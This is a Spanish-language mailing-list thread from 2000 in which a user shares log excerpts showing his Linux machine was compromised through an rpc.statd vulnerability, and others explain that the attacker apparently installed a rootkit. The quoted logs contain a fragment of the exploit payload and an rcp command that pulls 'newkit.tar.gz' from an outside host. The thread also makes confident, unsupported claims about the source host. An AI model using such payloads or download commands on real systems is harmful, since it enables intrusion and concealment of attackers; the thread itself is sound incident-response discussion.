Hack
Cristian Othon Martinez Vera
cfuga en itam.mx
Lun Sep 4 13:56:47 CDT 2000
On Mon, 4 Sep 2000, Gunnar Wolf wrote:
> >
> > Que tal amigos, checando mis log me encontre con esto
> > (...)
> > Sep 2 14:01:12 micompu rpc.statd[419]: gethostbyname error for
> > ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^
> > Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 8049710
> > 8054da0687465676274736f6d616e7972652065
> > 20726f7220726f66
>
> Se descubrio hace poco una vulnerabilidad enorme justo en el rpc.statd...
>
> > (...)
> >
> > y se que hicieron esto con la cuenta de root:
> > (...)
> > rcp root en 128.95.73.225:newkit.tar.gz .;
> >
> > Alguie sabe que significa, en verdad hackearon mi computadora?
>
> Sin lugar a dudas. newkit.tar.gz es seguramente un rootkit - un juego re
> archivos formado para ocultar la presencia de un atacante en tu sistema.
>
> Puede servirte el saber que 128.95.73.225 es horus.wtc.washington.edu, una
> computadora que corre algun tipo de Unix, y tiene una barbaridad de
> puertos abiertos. Eso puede indicar que su administrador no es muy bueno,
> y que, siendo probablemente una computadora utilizada por los alumnos de
> la Universidad de Washington, el administrador te agradecera que reportes
> quien se esta portando mal en su sistema, y posiblemente que le eches una
> mano para cerrar sus agujeros.
>
> Saludos,
Al contrario. Los administradores en la Universidad de Washington no son
nada malos. En realidad, el cracker que ataco por rpc cayo en un
"honeyput" o colmena: una granja de servidores con vulnerabilidades
conocidas donde se atrapan a crackers y scriptie kiddies, para estudiar
sus habitos y conductas, con monitoreo permanente a sus actividades. Asi
que los administradores de la UdeW deben estar mas que enterados de las
actividades de/de los crackers, y si los contactan estaran encantados de
la vida de recibir datos que complementen sus observaciones. Por eso
Gunnar, no te ha sido posible determinar en primera instancia el servidor
UNIX, y has visto la gran cantidad de puertos abiertos en el mismo.
Saludos
--
(o- Cristian Othon Martinez Vera <cfuga en itam.mx> Pulchrum est paucorum
//\ http://eniac.rhon.itam.mx/~cfuga/ hominum.
v_/_
---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx
Más información sobre la lista de distribución Ayuda